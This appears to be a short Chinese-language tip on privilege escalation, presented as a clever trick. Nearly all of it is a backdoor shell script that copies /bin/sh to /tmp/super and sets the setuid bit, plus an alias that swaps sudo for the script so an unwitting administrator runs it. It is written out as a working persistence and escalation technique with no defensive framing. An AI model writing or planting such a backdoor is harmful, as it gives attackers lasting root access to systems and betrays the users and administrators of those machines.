系统原程序:sudo、su、。。。这些具有suid标志的程序
后门脚本backdoor.sh
#!/usr/bin/sh
cp /usr/bin/sh /tmp/super
(chown `whoami`:`whoami` /tmp/super 2>/dev/null;chmod u+s /tmp/super 2>/dev/null;$0 $*);
将“系统原程序”另命名为执行backdoor.sh
alias sudo=‘backdoor.sh'
提权的奇淫巧计
